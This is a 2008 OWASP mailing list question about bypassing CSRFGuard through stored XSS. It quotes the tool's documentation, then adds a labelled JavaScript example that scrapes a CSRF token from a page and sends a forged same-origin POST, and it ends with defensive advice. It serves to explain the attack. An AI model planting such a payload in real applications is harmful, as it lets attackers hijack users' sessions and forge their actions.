[Owasp-cincinnati] Could someone explain how to bypass CSRF attack with stored XSS

Zhou, Yan yzhou at medplus.com
Wed Feb 27 10:01:52 EST 2008


Hi there,

Could someone explain in a little more detail how this is done? I think
I know the principle, but would like to see how that is actually carried
out.

Thanks,

Yan


Bypass CSRFGuard With Stored XSS 


There have been discussions suggesting that the unique request token can
be compromised using JavaScript. This attack implies that the
application also contains a stored cross-site scripting vulnerability,
which is frequently a more severe issue than cross-site request forgery.
The first MySpace worm worked in this manner: it used a cross-site
scripting vulnerability to forge requests to update a user's profile,
where the user profile update mechanism was protected with a CSRF
defense mechanism similar to what is provided by this filter. If your
application contains a stored cross-site scripting vulnerability, then
the unique request token can be parsed from the HTML response to
successfully forge form submissions.
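The sequence the quoted CSRFGuard text describes, written out as an added example (this is not code from the original post, from the MySpace worm, or from the CSRFGuard project). The injected script runs on the victim's origin, so it can fetch a protected page with the victim's cookies, read the hidden token field out of the HTML, and echo that token back in a forged POST; the filter sees a valid token and accepts the request. The token field name OWASP_CSRFTOKEN, the paths /profile/edit and /profile/update, the form fields and the sample page are all assumptions made for illustration.

```javascript
// Added example: how a stored-XSS payload defeats a per-session CSRF token.
// Field name, paths, form fields and the sample page below are assumptions.

// Constructed sample of the protected profile-edit page as the victim's
// browser would receive it. Only the hidden token input matters here.
const SAMPLE_PROFILE_PAGE = `
<html><body>
<form method="POST" action="/profile/update">
  <input type="hidden" name="OWASP_CSRFTOKEN" value="K9X2-7ZQ1-ABCD-EF01">
  <input type="text" name="headline" value="hello">
  <button type="submit">Save</button>
</form>
</body></html>`;

// Pull a hidden input's value out of an HTML response. A plain regex is used
// so the helper also runs outside a browser; in the injected script itself,
// DOMParser would do the same job. The only thing the attack needs is that
// the token is present in a page the victim's browser is allowed to read,
// which is always true for a same-origin request.
function extractHiddenField(html, fieldName) {
  const re = new RegExp(
    `<input[^>]*name=["']${fieldName}["'][^>]*value=["']([^"']*)["']`,
    'i'
  );
  const m = html.match(re);
  return m ? m[1] : null;
}

// Build an application/x-www-form-urlencoded body for the forged submission,
// with the stolen token added under the name the filter expects.
function buildForgedBody(token, fields, tokenName = 'OWASP_CSRFTOKEN') {
  const params = new URLSearchParams(fields);
  params.set(tokenName, token);
  return params.toString();
}

// The payload as it would run from the stored XSS in the victim's browser.
// Both requests are same-origin, so session cookies are sent automatically;
// the token check passes because the token the server issued is echoed back.
// fetchImpl is injectable so the flow can be exercised without a network.
async function forgeProfileUpdate(fetchImpl = fetch) {
  const page = await fetchImpl('/profile/edit', { credentials: 'same-origin' });
  const token = extractHiddenField(await page.text(), 'OWASP_CSRFTOKEN');
  if (token === null) {
    throw new Error('CSRF token not found in page');
  }
  return fetchImpl('/profile/update', {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildForgedBody(token, { headline: 'profile changed by injected script' }),
  });
}
```

The point to take from this is that a request token only proves the request came from a page on the same origin; once an attacker's script is running on that origin (stored XSS), it is a page on the same origin, and no token scheme, header check or SameSite cookie setting distinguishes it from the real form. The fix is to remove the XSS (output encoding, a content security policy), not to harden the CSRF filter.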


